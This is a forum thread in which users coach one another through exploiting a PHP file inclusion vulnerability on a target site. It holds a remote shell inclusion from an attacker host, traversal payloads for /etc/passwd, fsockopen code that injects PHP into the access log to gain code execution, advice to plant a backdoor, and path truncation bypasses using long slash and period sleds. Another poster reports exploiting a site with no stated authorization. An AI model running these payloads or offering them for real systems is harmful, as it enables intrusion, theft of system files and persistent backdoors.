Hi guys. Merry X-mas.

There is this site that has inclusion vulnerabilities that am supposed to pentest, and whenever i try to include a shell, i get this error.

Warning: Failed opening 'pages/http://www.attackingsite.com/chuksjonia/tools/shells/shell.txt?.htm' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/victim/pages/index.php on line 86

I'm still trying to see what could be blocking me, but some help from the professionals wouldn't hurt.

Nice Holidays.


/Chuks

Hi Chuks,

The "pages/" prefix won't let you include a remote file. Here you can only include local files. Try ../../../../../etc/passwd%00

If you know where the access.log or error.log file is and you can write your own HTTP headers, you can get yourself a RFI via LFI:

$handle=fsockopen('victim.com',80);
$headers='';
$headers.='GET /?<?php phpinfo();?> HTTP/1.1'.CRLF;
$headers.='host: victim.com'.CRLF;
$headers.='connection: close'.CRLF.CRLF;
fwrite($handle,$headers);

Then visit:
victim.com/?injectionFile=../../logs/access.log%00

You need to do the headers through HTTP because browsers encode them before sending.
From there, change around the code a bit until you can install a backdoor. But test the code on your localhost beforehand, because once you make a typo, php will spit out fatal errors and won't execute later injections.

LFI attempt gives this error.

Warning: Failed opening 'pages/../../../../../etc/passwd\0.htm' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/victim/pages/index.php on line 86

Hi barbarianbob. I have no idea how i can do the accesslog, but that is a good idea, i shud research on that. Incase u have an article or a small vid, please forward as an Xmas give, will highly appreciate.

when doing an LFI remember to do a null character like %00 %0A
to drop the tailing characters

http://www.xssed.com/archive/author=PaPPy/

@PaPPy: %0A doesn't seem to work for me. I tested through every character on a windows and a *nix box. Both only allow %00 when running the following code

for($a=0;$a<256;$a+=1){
  include('someFile.php'.chr($a).'.html');
}

Anything I'm missing?


@Chuks: The problem is the server is slashing the null byte. The server either has magic_quotes turned on or it's running addslashes() on your input. I did some testing, and the bypasses I found seem to be different based on the os. For windows, trail your file with a sled of periods. For *nix (which you're attacking) use a sled of slashes.

And by sled, I mean 4KB worth.

So, to hack the box, try what this evals to:

$url='http://victim.com/?injectFile=../../../../../../etc/passwd'.str_repeat('/',4096);

My test code to check which char sled works:

for($a=0;$a<256;$a+=1){
  $sled=str_repeat(chr($a),4096);
  @include('someFileThatExists.php'.$sled.'.html');
}
//windows allows chars 0,32,34,46,60,62
//*nix allows chars 0,47

Also, a quick write of how to use the access log to RFI:
http://reco.rd13.net/bullpoop/lfi2rfi.html

Thanks so for all your help and input. I tried the page_link=../../../../../../etc/passwd'.str_repeat('/',4096); and i get a error which looks like this.

Warning: Failed opening 'pages/../../../../../../etc/passwd\'.str_repeat(\'/\',4096);.htm' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/victim/pages/index.php on line 86.

Yes, magicqoutes is turned on, on this one. Is there i way i can make it initiate a download of the file without showing it on the site source or page?

Lemmie read up on the accesslog RIF.

No, you have to evaluate that code. As in fill the url in with 4096 slashes.
hxxp://victim.com/?injectFile=../../../../../../etc/passwd/////////////////////...etc

At a point it read my own passwd file, file:////////////////////etc/passwd

So i went on and still the error rolls out.

See if you can use that method to include a file that you know exists.

Example:
pages/home.html exists.
?injectionFile=../pages/home.html////////////etc



Edited 1 time(s). Last edit at 12/26/2008 02:26PM by barbarianbob.

I'm exploiting a site with a similar LFI vulnerability. Magic_quotes is on, so it escapes the null-byte. I attempted the sled method, but the include isn't loaded and the rest of the page isn't loaded as well. Is there anyway around this?

Do you know the site's operating system?
Any errors show up? If so, does it use include() or require()?
Can you confirm there's a file where you're pointing your inclusion?
Does the site use open-source code?

The best way to get a feel of it is to test it out on your localhost.
See if you can LFI something like the following:
<?php
$id=$_GET['id'];
if(!magic_quotes_gpc())$id=addslashes($id); //emulate magic quotes
require $id.'.html';
?>

We released an article that feature a deeper analysis of this bug plus some extra juice.

PHP filesystem attack vectors (Path normalization and truncation issues)
http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/

Hope you'll enjoy!
ascii
ush.it

Excellent !

I worked on it too, but I failed to exploit.
Do you know if PHP will provide a patch ?

Unfortunately, your attack doesn't seem to work if the include string begin with a slash.
Consider these scripts :

<?
$var = "aze/../../../../../etc/passwd" . str_repeat("/.",3000) . ".txt";
include($var);
?>
Works perfectly.

<?
$var = "/aze/../../../../../etc/passwd" . str_repeat("/.",3000) . ".txt";
include($var);
?>
doesn't work

The system calls differ, fstat64 instead of lstat64. Do you know why ?

thx



Edited 1 time(s). Last edit at 02/08/2009 12:04PM by ebo.

That's regular *NIX behavior by the way, you can blame Apache not PHP for that.